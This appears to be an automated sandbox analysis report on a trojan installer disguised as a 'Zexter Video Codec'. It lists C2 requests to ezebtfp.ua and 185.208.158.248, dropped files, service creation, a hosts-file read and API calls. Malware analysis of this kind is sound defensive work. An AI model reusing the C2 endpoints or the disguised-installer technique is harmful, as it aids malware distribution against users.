        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: ezebtfp.ua
        Source: global trafficDNS traffic detected: DNS query: signup.live.com
        Source: zextervideocodec32_64.exe, 00000003.00000002.3289384542.00000000035BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.2
        Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3289222096.0000000003509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c8
        Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.0000000000881000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3289222096.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000008BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
        Source: zextervideocodec32_64.exe, 00000003.00000002.3289384542.00000000035BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.258.2
        Source: is-FGQU3.tmp.1.drString found in binary or memory: http://WWW-Authenticate:Proxy-Authenticate:Content-Encoding:gzip1.2.8Content-Length:-/recv
        Source: is-TNU6F.tmp.1.drString found in binary or memory: http://freedesktop.org
        Source: is-TNU6F.tmp.1.drString found in binary or memory: http://freedesktop.orgtypenameexeccounttimestampparse_data-
        Source: L9rm7AX4mp.exe, 00000000.00000002.3287835540.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2036923371.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039536568.0000000002090000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3288142332.0000000002084000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fsf.org/
        Source: is-9G1LK.tmp.1.drString found in binary or memory: http://gcc.gnu.org/bugs.html):
        Source: is-61SBR.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: is-FGQU3.tmp.1.drString found in binary or memory: http://purl.oclc.org/dsdl/schematron
        Source: is-FGQU3.tmp.1.drString found in binary or memory: http://purl.oclc.org/dsdl/schematronpathhttp://www.ascc.net/xml/schematron:node
        Source: is-FGQU3.tmp.1.drString found in binary or memory: http://relaxng.org/ns/structure/1.0
        Source: is-FGQU3.tmp.1.drString found in binary or memory: http://relaxng.org/ns/structure/1.0definenameincludegrammarxmlRelaxNGParse:
        Source: is-4BT74.tmp.1.drString found in binary or memory: http://tukaani.org/
        Source: is-4BT74.tmp.1.drString found in binary or memory: http://tukaani.org/xz/
        Source: is-FGQU3.tmp.1.drString found in binary or memory: http://www.ascc.net/xml/schematron
        Source: is-2DT7G.tmp.1.drString found in binary or memory: http://www.freedesktop.org/standards/dbus/1.0/introspect.dtd
        Source: is-TNU6F.tmp.1.drString found in binary or memory: http://www.freedesktop.org/standards/desktop-bookmarks
        Source: is-TNU6F.tmp.1.drString found in binary or memory: http://www.freedesktop.org/standards/desktop-bookmarksapplicationgroupapplicationsgroupsprivateiconh
        Source: is-TNU6F.tmp.1.drString found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
        Source: L9rm7AX4mp.exe, 00000000.00000002.3287835540.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2036923371.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039536568.0000000002090000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3288142332.0000000002084000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.000000000085B000.00000004.00000020.00020000.00000000.sdmp, is-K2QCH.tmp.1.dr, is-LP383.tmp.1.drString found in binary or memory: http://www.gnu.org/licenses/
        Source: L9rm7AX4mp.tmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.drString found in binary or memory: http://www.innosetup.com/
        Source: is-FGQU3.tmp.1.drString found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd
        Source: is-FGQU3.tmp.1.drString found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD
        Source: L9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
        Source: L9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU

        System Summary

        barindex
        PE file has a writeable .text section
        Source: zextervideocodec32_64.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: EMAIL Safe Storage 10.2.46.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0042F530 NtdllDefWindowProc_A,1_2_0042F530
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004789DC NtdllDefWindowProc_A,1_2_004789DC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_004573CC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E944
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555D0
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_0040840C0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004804C61_2_004804C6
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004709501_2_00470950
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004352D81_2_004352D8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004677101_2_00467710
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0043036C1_2_0043036C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004444D81_2_004444D8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004345D41_2_004345D4
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004866041_2_00486604
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00444A801_2_00444A80
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00430EF81_2_00430EF8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004451781_2_00445178
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0045F4301_2_0045F430
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0045B4D81_2_0045B4D8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004875641_2_00487564
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004455841_2_00445584
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004697701_2_00469770
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0048D8C41_2_0048D8C4
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004519A81_2_004519A8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0043DD601_2_0043DD60
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_023812601_2_02381260
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_02381D201_2_02381D20
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_00406C473_2_00406C47
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_004010513_2_00401051
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_00401C263_2_00401C26
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BFC2AD3_2_02BFC2AD
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BFB4E53_2_02BFB4E5
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BDE22D3_2_02BDE22D
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BCF0503_2_02BCF050
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BE4EC93_2_02BE4EC9
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BE2E543_2_02BE2E54
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BDE6453_2_02BDE645
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BD9F243_2_02BD9F24
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BD84E23_2_02BD84E2
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BDACDA3_2_02BDACDA
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BE54403_2_02BE5440
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BDDD393_2_02BDDD39
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmp 4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: String function: 02BE53D0 appears 138 times
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: String function: 02BD8B80 appears 37 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00405964 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00408C14 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00406ACC appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00403400 appears 61 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00445DE4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 004078FC appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 004344EC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00403494 appears 82 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00457D58 appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00453330 appears 93 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00457B4C appears 98 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 00403684 appears 221 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: String function: 004460B4 appears 59 times
        Source: L9rm7AX4mp.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: L9rm7AX4mp.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: L9rm7AX4mp.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: L9rm7AX4mp.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: L9rm7AX4mp.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-1611L.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-1611L.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-1611L.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-1611L.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-61SBR.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-6S03E.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-JTN8Q.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-2TIQ1.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-MJPNF.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-TNU6F.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-MVKEA.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-O9QDL.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-4BT74.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-H2J0H.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-OMDJC.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-2DT7G.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-ILE5I.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-6DO3I.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: L9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs L9rm7AX4mp.exe
        Source: L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs L9rm7AX4mp.exe
        Source: L9rm7AX4mp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@5/154@3/2
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BD08A0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,3_2_02BD08A0
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555D0
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455DF8
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,3_2_0040D3E8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0046E38C GetVersion,CoCreateInstance,1_2_0046E38C
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_00402199 lstrcmpiW,StartServiceCtrlDispatcherA,lstrcmpiW,3_2_00402199
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_00402199 lstrcmpiW,StartServiceCtrlDispatcherA,lstrcmpiW,3_2_00402199
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_0040D487 StartServiceCtrlDispatcherA,3_2_0040D487
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_00402170 StartServiceCtrlDispatcherA,3_2_00402170
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_00402170 StartServiceCtrlDispatcherA,3_2_00402170
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile created: C:\Users\user\AppData\Local\Zexter Video CodecJump to behavior
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeFile created: C:\Users\user\AppData\Local\Temp\is-BVT50.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: L9rm7AX4mp.exeReversingLabs: Detection: 23%
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeFile read: C:\Users\user\Desktop\L9rm7AX4mp.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\L9rm7AX4mp.exe "C:\Users\user\Desktop\L9rm7AX4mp.exe"
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp "C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp" /SL5="$20420,8045603,54272,C:\Users\user\Desktop\L9rm7AX4mp.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess created: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe "C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe" -i
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp "C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp" /SL5="$20420,8045603,54272,C:\Users\user\Desktop\L9rm7AX4mp.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpProcess created: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe "C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe" -iJump to behavior
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: explorerframe.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: dsound.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeSection loaded: iphlpapi.dllJump to behavior
